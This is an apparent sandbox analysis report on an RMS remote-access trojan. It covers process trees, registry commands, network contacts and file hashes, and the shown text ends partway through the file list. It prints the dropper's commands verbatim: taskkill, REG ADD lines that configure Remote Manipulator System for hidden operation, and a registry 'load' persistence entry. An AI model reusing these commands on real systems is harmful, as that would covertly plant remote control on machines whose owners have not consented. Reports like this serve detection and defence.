Malware Analysis Report

2024-11-30 19:52

Sample ID 220128-17qlmsfda9
Target 80fb8a3b1fda0a1483e87e749c7a2f2a9c9fdaf6c3d581668baba723b9e2a920
SHA256 80fb8a3b1fda0a1483e87e749c7a2f2a9c9fdaf6c3d581668baba723b9e2a920
Tags
rms rat trojan
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V6

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

80fb8a3b1fda0a1483e87e749c7a2f2a9c9fdaf6c3d581668baba723b9e2a920

Threat Level: Known bad

The file 80fb8a3b1fda0a1483e87e749c7a2f2a9c9fdaf6c3d581668baba723b9e2a920 was found to be: Known bad.

Malicious Activity Summary

rms rat trojan

RMS

Executes dropped EXE

Loads dropped DLL

autoit_exe

Drops file in System32 directory

Suspicious use of SetThreadContext

Enumerates physical storage devices

Modifies registry class

Suspicious use of WriteProcessMemory

Suspicious behavior: GetForegroundWindowSpam

Suspicious use of AdjustPrivilegeToken

Suspicious use of FindShellTrayWindow

Suspicious use of SendNotifyMessage

Suspicious use of SetWindowsHookEx

Suspicious behavior: EnumeratesProcesses

Kills process with taskkill

Checks processor information in registry

Modifies Internet Explorer settings

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2022-01-28 22:17

Signatures

N/A

Analysis: behavioral1

Detonation Overview

Submitted

2022-01-28 22:17

Reported

2022-01-28 22:45

Platform

win7-en-20211208

Max time kernel

155s

Max time network

154s

Command Line

"C:\Users\Admin\AppData\Local\Temp\80fb8a3b1fda0a1483e87e749c7a2f2a9c9fdaf6c3d581668baba723b9e2a920.exe"

Signatures

RMS

trojan rat rms

autoit_exe

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Enumerates physical storage devices

Kills process with taskkill

evasion
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A

Suspicious behavior: GetForegroundWindowSpam

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Roaming\Microsoft\rutserv.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Users\Admin\AppData\Roaming\Microsoft\rutserv.exe N/A
Token: SeTcbPrivilege N/A C:\Users\Admin\AppData\Roaming\Microsoft\rutserv.exe N/A
Token: SeTcbPrivilege N/A C:\Users\Admin\AppData\Roaming\Microsoft\rutserv.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Roaming\Microsoft\hide.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Microsoft\hide.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Microsoft\hide.exe N/A

Suspicious use of SendNotifyMessage

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Roaming\Microsoft\hide.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Microsoft\hide.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Microsoft\hide.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 1684 wrote to memory of 880 N/A C:\Users\Admin\AppData\Local\Temp\80fb8a3b1fda0a1483e87e749c7a2f2a9c9fdaf6c3d581668baba723b9e2a920.exe C:\Users\Admin\AppData\Local\Temp\RarSFX0\hide.exe
PID 1684 wrote to memory of 880 N/A C:\Users\Admin\AppData\Local\Temp\80fb8a3b1fda0a1483e87e749c7a2f2a9c9fdaf6c3d581668baba723b9e2a920.exe C:\Users\Admin\AppData\Local\Temp\RarSFX0\hide.exe
PID 1684 wrote to memory of 880 N/A C:\Users\Admin\AppData\Local\Temp\80fb8a3b1fda0a1483e87e749c7a2f2a9c9fdaf6c3d581668baba723b9e2a920.exe C:\Users\Admin\AppData\Local\Temp\RarSFX0\hide.exe
PID 1684 wrote to memory of 880 N/A C:\Users\Admin\AppData\Local\Temp\80fb8a3b1fda0a1483e87e749c7a2f2a9c9fdaf6c3d581668baba723b9e2a920.exe C:\Users\Admin\AppData\Local\Temp\RarSFX0\hide.exe
PID 1684 wrote to memory of 880 N/A C:\Users\Admin\AppData\Local\Temp\80fb8a3b1fda0a1483e87e749c7a2f2a9c9fdaf6c3d581668baba723b9e2a920.exe C:\Users\Admin\AppData\Local\Temp\RarSFX0\hide.exe
PID 1684 wrote to memory of 880 N/A C:\Users\Admin\AppData\Local\Temp\80fb8a3b1fda0a1483e87e749c7a2f2a9c9fdaf6c3d581668baba723b9e2a920.exe C:\Users\Admin\AppData\Local\Temp\RarSFX0\hide.exe
PID 1684 wrote to memory of 880 N/A C:\Users\Admin\AppData\Local\Temp\80fb8a3b1fda0a1483e87e749c7a2f2a9c9fdaf6c3d581668baba723b9e2a920.exe C:\Users\Admin\AppData\Local\Temp\RarSFX0\hide.exe
PID 880 wrote to memory of 540 N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\hide.exe C:\Windows\SysWOW64\cmd.exe
PID 880 wrote to memory of 540 N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\hide.exe C:\Windows\SysWOW64\cmd.exe
PID 880 wrote to memory of 540 N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\hide.exe C:\Windows\SysWOW64\cmd.exe
PID 880 wrote to memory of 540 N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\hide.exe C:\Windows\SysWOW64\cmd.exe
PID 880 wrote to memory of 540 N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\hide.exe C:\Windows\SysWOW64\cmd.exe
PID 880 wrote to memory of 540 N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\hide.exe C:\Windows\SysWOW64\cmd.exe
PID 880 wrote to memory of 540 N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\hide.exe C:\Windows\SysWOW64\cmd.exe
PID 540 wrote to memory of 568 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\taskkill.exe
PID 540 wrote to memory of 568 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\taskkill.exe
PID 540 wrote to memory of 568 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\taskkill.exe
PID 540 wrote to memory of 568 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\taskkill.exe
PID 540 wrote to memory of 568 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\taskkill.exe
PID 540 wrote to memory of 568 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\taskkill.exe
PID 540 wrote to memory of 568 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\taskkill.exe
PID 540 wrote to memory of 1484 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\taskkill.exe
PID 540 wrote to memory of 1484 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\taskkill.exe
PID 540 wrote to memory of 1484 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\taskkill.exe
PID 540 wrote to memory of 1484 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\taskkill.exe
PID 540 wrote to memory of 1484 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\taskkill.exe
PID 540 wrote to memory of 1484 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\taskkill.exe
PID 540 wrote to memory of 1484 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\taskkill.exe
PID 540 wrote to memory of 1552 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 540 wrote to memory of 1552 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 540 wrote to memory of 1552 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 540 wrote to memory of 1552 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 540 wrote to memory of 1552 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 540 wrote to memory of 1552 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 540 wrote to memory of 1552 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 540 wrote to memory of 432 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 540 wrote to memory of 432 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 540 wrote to memory of 432 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 540 wrote to memory of 432 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 540 wrote to memory of 432 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 540 wrote to memory of 432 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 540 wrote to memory of 432 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 540 wrote to memory of 1816 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 540 wrote to memory of 1816 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 540 wrote to memory of 1816 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 540 wrote to memory of 1816 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 540 wrote to memory of 1816 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 540 wrote to memory of 1816 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 540 wrote to memory of 1816 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 540 wrote to memory of 1100 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 540 wrote to memory of 1100 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 540 wrote to memory of 1100 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 540 wrote to memory of 1100 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 540 wrote to memory of 1100 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 540 wrote to memory of 1100 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 540 wrote to memory of 1100 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 540 wrote to memory of 1104 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 540 wrote to memory of 1104 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 540 wrote to memory of 1104 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 540 wrote to memory of 1104 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 540 wrote to memory of 1104 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 540 wrote to memory of 1104 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 540 wrote to memory of 1104 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 540 wrote to memory of 1052 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe

Processes

C:\Users\Admin\AppData\Local\Temp\80fb8a3b1fda0a1483e87e749c7a2f2a9c9fdaf6c3d581668baba723b9e2a920.exe

"C:\Users\Admin\AppData\Local\Temp\80fb8a3b1fda0a1483e87e749c7a2f2a9c9fdaf6c3d581668baba723b9e2a920.exe"

C:\Users\Admin\AppData\Local\Temp\RarSFX0\hide.exe

"C:\Users\Admin\AppData\Local\Temp\RarSFX0\hide.exe" /rhc uac.cmd

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\Users\Admin\AppData\Local\Temp\RarSFX0\uac.cmd" "

C:\Windows\SysWOW64\taskkill.exe

taskkill /f /im rutserv.exe

C:\Windows\SysWOW64\taskkill.exe

taskkill /f /im rfusclient.exe

C:\Windows\SysWOW64\reg.exe

REG ADD "HKCU\Software\TektonIT\Remote Manipulator System\Server\Parameters" /f /v "Options" /t REG_BINARY /d 545046301154524f4d5365727665724f7074696f6e7300095573654e5441757468080d53656375726974794c6576656c020304506f727403121614456e61626c654f7665726c617943617074757265080c53686f775472617949636f6e080642696e644950060d416e7920696e746572666163651343616c6c6261636b4175746f436f6e6e656374091743616c6c6261636b436f6e6e656374496e74657276616c023c0c50617373776f726444617461060c364f6d2b75675147394b493d084869646553746f70090c497046696c746572547970650202105573654c656761637943617074757265081750726f7465637443616c6c6261636b53657474696e6773081550726f74656374496e6574496453657474696e6773080f446f4e6f7443617074757265524450080755736549507636091141736b557365725065726d697373696f6e0816557365725065726d697373696f6e496e74657276616c031027134175746f416c6c6f775065726d697373696f6e08134e656564417574686f72697479536572766572081f41736b5065726d697373696f6e4f6e6c794966557365724c6f676765644f6e0811557365496e6574436f6e6e656374696f6e0813557365437573746f6d496e6574536572766572080a496e65744964506f727402000d557365496e6574496449507636081444697361626c6552656d6f7465436f6e74726f6c081344697361626c6552656d6f746553637265656e081344697361626c6546696c655472616e73666572080f44697361626c655265646972656374080d44697361626c6554656c6e6574081444697361626c6552656d6f746545786563757465081244697361626c655461736b4d616e61676572080e44697361626c654f7665726c6179080f44697361626c6553687574646f776e081444697361626c6552656d6f746555706772616465081544697361626c655072657669657743617074757265081444697361626c654465766963654d616e61676572080b44697361626c6543686174081344697361626c6553637265656e5265636f7264081044697361626c65415643617074757265081244697361626c6553656e644d657373616765080f44697361626c655265676973747279080d44697361626c65415643686174081544697361626c6552656d6f746553657474696e6773081544697361626c6552656d6f74655072696e74696e67080a44697361626c65526470080f4e6f7469667953686f7750616e656c08144e6f746966794368616e67655472617949636f6e08104e6f7469667942616c6c6f6e48696e74080f4e6f74696679506c6179536f756e64080c4e6f7469667950616e656c5802ff0c4e6f7469667950616e656c5902ff064c6f6755736508055369644964061034323033342e37373133373636373832084c6963656e73657306ba524d532d462d36423764666137333434354538394333393762653062623966423866433637666269593253326459586c52664477776e493233696f4f4743346f44686a584b647a4134585246344d44463145624373685631304e48313545447777374b57304241414d484151514e487a7370625135635251344141687741616d426841676b4362774d454377566d64324d4c424235555267344e557a773562514945486c4e635241384d6653593253326459586c526644773d3d0d50726f787953657474696e67731428010000efbbbf3c3f786d6c2076657273696f6e3d22312e302220656e636f64696e673d225554462d31364c45223f3e0d0a3c70726f78795f73657474696e67732076657273696f6e3d223630303034223e3c7573655f70726f78793e66616c73653c2f7573655f70726f78793e3c70726f78795f747970653e303c2f70726f78795f747970653e3c686f73743e3c2f686f73743e3c706f72743e383038303c2f706f72743e3c6e6565645f617574683e66616c73653c2f6e6565645f617574683e3c6e746d6c5f617574683e66616c73653c2f6e746d6c5f617574683e3c757365726e616d653e3c2f757365726e616d653e3c70617373776f72643e3c2f70617373776f72643e3c646f6d61696e3e3c2f646f6d61696e3e3c2f70726f78795f73657474696e67733e0d0a0a4164646974696f6e616c0604353535351144697361626c65496e7465726e65744964080b536166654d6f6465536574080000

C:\Windows\SysWOW64\reg.exe

REG ADD "HKCU\Software\TektonIT\Remote Manipulator System\Server\Parameters" /f /v "InternetId" /t REG_BINARY /d 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

C:\Windows\SysWOW64\reg.exe

REG ADD "HKCU\Software\TektonIT\Remote Manipulator System\Server\Parameters" /f /v "Password" /t REG_BINARY /d 38003900440043004100460043003500460042003900450044004200380041003800370030003400350033003600390033003300350037003700340030003800440031003700410036003500390036003400390033003800460033004100340035003400380036003200370030003100310037004600420036003300390041003700350043004300310039004400360046003400380030003000460030003700320037003900370036004200370030004300420041003800340037003700390034003900300034003600450033003400360034003600350030004300430045004100410045003800390046004100430030003500390037004600390032003400

C:\Windows\SysWOW64\reg.exe

REG ADD "HKCU\Software\TektonIT\Remote Manipulator System\Server\Parameters" /f /v "CallbackSettings" /t REG_BINARY /d fffe

C:\Windows\SysWOW64\reg.exe

REG ADD "HKCU\Software\TektonIT\Remote Manipulator System\Server\Parameters" /f /v "notification" /t REG_BINARY /d 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

C:\Windows\SysWOW64\reg.exe

REG ADD "HKCU\Software\TektonIT\Remote Manipulator System\Server\Parameters" /f /v "FUSClientPath" /t REG_SZ /d "C:\Users\Admin\AppData\Roaming\Microsoft\rfusclient.exe"

C:\Windows\SysWOW64\reg.exe

REG ADD "HKCU\Software\TektonIT\Remote Manipulator System\Server\Parameters" /f /v "CalendarRecordSettings" /t REG_BINARY /d fffe3c003f0078006d006c002000760065007200730069006f006e003d00220031002e0030002200200065006e0063006f00640069006e0067003d0022005500540046002d003100360022003f003e000d000a003c0073007200650065006e005f007200650063006f00720064005f006f007000740069006f006e002000760065007200730069006f006e003d0022003600300030003000340022003e003c006d00610069006e005f006f007000740069006f006e0073003e003c006100630074006900760065003e00660061006c00730065003c002f006100630074006900760065003e003c0069006e00740065007200760061006c005f00730068006f0074003e00360030003c002f0069006e00740065007200760061006c005f00730068006f0074003e003c00700072006f0074006500630074005f007200650063006f00720064003e00660061006c00730065003c002f00700072006f0074006500630074005f007200650063006f00720064003e003c0063006f006d007000720065007300730069006f006e005f007100750061006c006900740079003e00390030003c002f0063006f006d007000720065007300730069006f006e005f007100750061006c006900740079003e003c007300630061006c0065005f007100750061006c006900740079003e003100300030003c002f007300630061006c0065005f007100750061006c006900740079003e003c0063006f006d007000720065007300730069006f006e005f0074007900700065003e0030003c002f0063006f006d007000720065007300730069006f006e005f0074007900700065003e003c006d00610078005f00660069006c0065005f00730069007a0065003e003100300030003c002f006d00610078005f00660069006c0065005f00730069007a0065003e003c006100750074006f005f0063006c006500610072003e00660061006c00730065003c002f006100750074006f005f0063006c006500610072003e003c006100750074006f005f0063006c006500610072005f0064006100790073003e0030003c002f006100750074006f005f0063006c006500610072005f0064006100790073003e003c0075007300650064005f00660069006c0065005f006c0069006d00690074003e0074007200750065003c002f0075007300650064005f00660069006c0065005f006c0069006d00690074003e003c0061006c006c005f00660069006c00650073005f006c0069006d00690074005f006d0062003e0031003000300030003c002f0061006c006c005f00660069006c00650073005f006c0069006d00690074005f006d0062003e003c0064007200610077005f006400610074006100740069006d0065005f006f006e005f0069006d006100670065003e0074007200750065003c002f0064007200610077005f006400610074006100740069006d0065005f006f006e005f0069006d006100670065003e003c002f006d00610069006e005f006f007000740069006f006e0073003e003c007300630068006500640075006c00650073002f003e003c002f0073007200650065006e005f007200650063006f00720064005f006f007000740069006f006e003e000d000a00

C:\Windows\SysWOW64\reg.exe

reg add "HKCU\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows" /v load /t REG_SZ /d "C:\Users\Admin\AppData\Roaming\Microsoft\hide.exe" /f

C:\Users\Admin\AppData\Local\Temp\RarSFX0\hide.exe

hide.exe /fwl Internet C:\Users\Admin\AppData\Roaming\Microsoft\rutserv.exe

C:\Users\Admin\AppData\Roaming\Microsoft\hide.exe

C:\Users\Admin\AppData\Roaming\Microsoft\hide.exe

C:\Users\Admin\AppData\Roaming\Microsoft\hide.exe

C:\Users\Admin\AppData\Roaming\Microsoft\hide.exe

C:\Users\Admin\AppData\Roaming\Microsoft\rutserv.exe

rutserv.exe

C:\Users\Admin\AppData\Roaming\Microsoft\rutserv.exe

rutserv.exe

C:\Users\Admin\AppData\Roaming\Microsoft\rutserv.exe

C:\Users\Admin\AppData\Roaming\Microsoft\rutserv.exe -second

C:\Users\Admin\AppData\Roaming\Microsoft\rutserv.exe

C:\Users\Admin\AppData\Roaming\Microsoft\rutserv.exe -second

C:\Users\Admin\AppData\Roaming\Microsoft\rfusclient.exe

C:\Users\Admin\AppData\Roaming\Microsoft\rfusclient.exe /tray /user

C:\Users\Admin\AppData\Roaming\Microsoft\rfusclient.exe

C:\Users\Admin\AppData\Roaming\Microsoft\rfusclient.exe /tray /user

C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe

"C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe" "C:\Users\Admin\AppData\Local\Temp\RarSFX0\MIP1023.pdf"

Network

Country Destination Domain Proto
US 8.8.8.8:53 rms-server.tektonit.ru udp
RU 95.213.205.83:5655 rms-server.tektonit.ru tcp
US 8.8.8.8:53 rmansys.ru udp
RU 31.31.198.18:80 rmansys.ru tcp
RU 31.31.198.18:80 rmansys.ru tcp
RU 95.213.205.83:5655 rms-server.tektonit.ru tcp

Files

memory/1684-54-0x0000000075D51000-0x0000000075D53000-memory.dmp

\Users\Admin\AppData\Local\Temp\RarSFX0\hide.exe

MD5 824b1588338b6731e28ff94c621ced0b
SHA1 cd1bc431f53e9cff8204279cdf274838de8ebb61
SHA256 5f8d156ed1f17a23a49f29b2e7954c629d74c0e12b98c46ced0c9f28f35aa369
SHA512 b9a9cbf1171a1328fcabf013cdf33133f19ab61bc34fc892fb592de007179def90af4be095038880e0d5653c5cfe2a191cccb1e906cfe335937201970550161e

\Users\Admin\AppData\Local\Temp\RarSFX0\hide.exe

MD5 824b1588338b6731e28ff94c621ced0b
SHA1 cd1bc431f53e9cff8204279cdf274838de8ebb61
SHA256 5f8d156ed1f17a23a49f29b2e7954c629d74c0e12b98c46ced0c9f28f35aa369
SHA512 b9a9cbf1171a1328fcabf013cdf33133f19ab61bc34fc892fb592de007179def90af4be095038880e0d5653c5cfe2a191cccb1e906cfe335937201970550161e

\Users\Admin\AppData\Local\Temp\RarSFX0\hide.exe

MD5 824b1588338b6731e28ff94c621ced0b
SHA1 cd1bc431f53e9cff8204279cdf274838de8ebb61
SHA256 5f8d156ed1f17a23a49f29b2e7954c629d74c0e12b98c46ced0c9f28f35aa369
SHA512 b9a9cbf1171a1328fcabf013cdf33133f19ab61bc34fc892fb592de007179def90af4be095038880e0d5653c5cfe2a191cccb1e906cfe335937201970550161e

\Users\Admin\AppData\Local\Temp\RarSFX0\hide.exe

MD5 824b1588338b6731e28ff94c621ced0b
SHA1 cd1bc431f53e9cff8204279cdf274838de8ebb61
SHA256 5f8d156ed1f17a23a49f29b2e7954c629d74c0e12b98c46ced0c9f28f35aa369
SHA512 b9a9cbf1171a1328fcabf013cdf33133f19ab61bc34fc892fb592de007179def90af4be095038880e0d5653c5cfe2a191cccb1e906cfe335937201970550161e

C:\Users\Admin\AppData\Local\Temp\RarSFX0\hide.exe

MD5 824b1588338b6731e28ff94c621ced0b
SHA1 cd1bc431f53e9cff8204279cdf274838de8ebb61
SHA256 5f8d156ed1f17a23a49f29b2e7954c629d74c0e12b98c46ced0c9f28f35aa369
SHA512 b9a9cbf1171a1328fcabf013cdf33133f19ab61bc34fc892fb592de007179def90af4be095038880e0d5653c5cfe2a191cccb1e906cfe335937201970550161e

C:\Users\Admin\AppData\Local\Temp\RarSFX0\uac.cmd

MD5 36d09166ae9f88caa1b2d80a392ed1c8
SHA1 b248e43bab127d8e1e466821b96b7b7ecf37cb78
SHA256 3552631b96bf28d3e4641cc83684e5bd2cc00cc9aca31d456c688d16df674135
SHA512 d45e916cd913c6c1fbd59cd94c8ab55c158c9c616decaffccf0334ae4dd82b30301809c334322858c9b8b44d5d72bfe2ee2ee5b11a65a5ea9d945581e67a089b

C:\Users\Admin\AppData\Local\Temp\RarSFX0\data.dat

MD5 f1d16ce97d2fb39ad52e84bdc8d51d46
SHA1 c268cab6d8ec267eee463672809faaee99c2f446
SHA256 85417332dae0e7cf7ee44773d19e344c27bbf000d9165ca1e0c7a6d0f9e57a0f
SHA512 cff4f2475ed74e9102a2cfd88d019119f90d47086dcef3a2c053c0a7b0279076caf7782aeb314b857c304b52cd482badb4e6e1a611191a807317e92e60fe16e5

C:\Users\Admin\AppData\Local\Temp\RarSFX0\hide.dat

MD5 eb513889e806ce193274ea8858e89ab5
SHA1 3c1ff7bbe8bc2be9e5531ffad25b18f03c51cf6b
SHA256 f5609e3bcc1695839ae0d3a3ff08d5c73d0bab4afa3a2b5fced6c9b14f2aa993
SHA512 cb3d254c7ee4c918a320629e461b99acf90ef92d0276d2663f1b93ea17aa8612226c39c7c234283955fe9e071f7fa324f2586e7eba8ebc3fb5674f58af005e26

C:\Users\Admin\AppData\Local\Temp\RarSFX0\rfusclient.dat

MD5 a24ce4468618751732a5f3cd01e66a8b
SHA1 4d46fb773c02a9ff98e998da4f0777fb5d9f796b
SHA256 acf797494691e34077f9e6cda9a39f91a3efa0a840b71859ffde36bf3e228f2e
SHA512 4eb928491764b2960474e71229d8a3f219029f91ff3725218d58de83ae414c3f7b3bc421915b008aaf1393706a0c836615906bd6a6291af6370bb9f98ab58a3a

C:\Users\Admin\AppData\Local\Temp\RarSFX0\MIP1023.pdf

MD5 83f604f3087b84afc6846673054e861f
SHA1 88c3fda42768c5b465fd680591639f2cdc933283
SHA256 11e0a49bfe8173983e6ddf13052da345b3322f8d6d8cd2e89dd602d89941516e
SHA512 73ff11caf9b5415157c409d3bcef0b534146538c632f4850ab813cfdbb15ef5f057ad2a1bda591e9ec27ad16d7e8aa10e4b58bc603db53c859819f1a08c01f98

C:\Users\Admin\AppData\Local\Temp\RarSFX0\hide.exe

MD5 824b1588338b6731e28ff94c621ced0b
SHA1 cd1bc431f53e9cff8204279cdf274838de8ebb61
SHA256 5f8d156ed1f17a23a49f29b2e7954c629d74c0e12b98c46ced0c9f28f35aa369
SHA512 b9a9cbf1171a1328fcabf013cdf33133f19ab61bc34fc892fb592de007179def90af4be095038880e0d5653c5cfe2a191cccb1e906cfe335937201970550161e

C:\Users\Admin\AppData\Local\Temp\RarSFX0\rutserv.dat

MD5 27a98c9a7fa7120147ae523efa9fadbf
SHA1 6a5ca3b9ee0a048f0aee1e99cbf3943d84f597ff
SHA256 53071088adb86f5d7a8c82573da94849edbd5f102bc94c9775247a54e26eaf57
SHA512 8f09b0211e6c4c6d5ddf9a797e59501bb0db4cb2d8d730f4c412a4b83adf68ad617516f330e1b0bcfecb07c514be56440e5b2ac3c55537495ce19ae64fcbf03c

\Users\Admin\AppData\Local\Temp\RarSFX0\hide.exe

MD5 824b1588338b6731e28ff94c621ced0b
SHA1 cd1bc431f53e9cff8204279cdf274838de8ebb61
SHA256 5f8d156ed1f17a23a49f29b2e7954c629d74c0e12b98c46ced0c9f28f35aa369
SHA512 b9a9cbf1171a1328fcabf013cdf33133f19ab61bc34fc892fb592de007179def90af4be095038880e0d5653c5cfe2a191cccb1e906cfe335937201970550161e

C:\Users\Admin\AppData\Local\Temp\RarSFX0\hide.exe

MD5 824b1588338b6731e28ff94c621ced0b
SHA1 cd1bc431f53e9cff8204279cdf274838de8ebb61
SHA256 5f8d156ed1f17a23a49f29b2e7954c629d74c0e12b98c46ced0c9f28f35aa369
SHA512 b9a9cbf1171a1328fcabf013cdf33133f19ab61bc34fc892fb592de007179def90af4be095038880e0d5653c5cfe2a191cccb1e906cfe335937201970550161e

\Users\Admin\AppData\Roaming\Microsoft\hide.exe

MD5 824b1588338b6731e28ff94c621ced0b
SHA1 cd1bc431f53e9cff8204279cdf274838de8ebb61
SHA256 5f8d156ed1f17a23a49f29b2e7954c629d74c0e12b98c46ced0c9f28f35aa369
SHA512 b9a9cbf1171a1328fcabf013cdf33133f19ab61bc34fc892fb592de007179def90af4be095038880e0d5653c5cfe2a191cccb1e906cfe335937201970550161e

C:\Users\Admin\AppData\Roaming\Microsoft\hide.exe

MD5 824b1588338b6731e28ff94c621ced0b
SHA1 cd1bc431f53e9cff8204279cdf274838de8ebb61
SHA256 5f8d156ed1f17a23a49f29b2e7954c629d74c0e12b98c46ced0c9f28f35aa369
SHA512 b9a9cbf1171a1328fcabf013cdf33133f19ab61bc34fc892fb592de007179def90af4be095038880e0d5653c5cfe2a191cccb1e906cfe335937201970550161e

\Users\Admin\AppData\Roaming\Microsoft\hide.exe

MD5 824b1588338b6731e28ff94c621ced0b
SHA1 cd1bc431f53e9cff8204279cdf274838de8ebb61
SHA256 5f8d156ed1f17a23a49f29b2e7954c629d74c0e12b98c46ced0c9f28f35aa369
SHA512 b9a9cbf1171a1328fcabf013cdf33133f19ab61bc34fc892fb592de007179def90af4be095038880e0d5653c5cfe2a191cccb1e906cfe335937201970550161e

C:\Users\Admin\AppData\Roaming\Microsoft\hide.exe

MD5 824b1588338b6731e28ff94c621ced0b
SHA1 cd1bc431f53e9cff8204279cdf274838de8ebb61
SHA256 5f8d156ed1f17a23a49f29b2e7954c629d74c0e12b98c46ced0c9f28f35aa369
SHA512 b9a9cbf1171a1328fcabf013cdf33133f19ab61bc34fc892fb592de007179def90af4be095038880e0d5653c5cfe2a191cccb1e906cfe335937201970550161e

C:\Users\Admin\AppData\Roaming\Microsoft\hide.dat

MD5 eb513889e806ce193274ea8858e89ab5
SHA1 3c1ff7bbe8bc2be9e5531ffad25b18f03c51cf6b
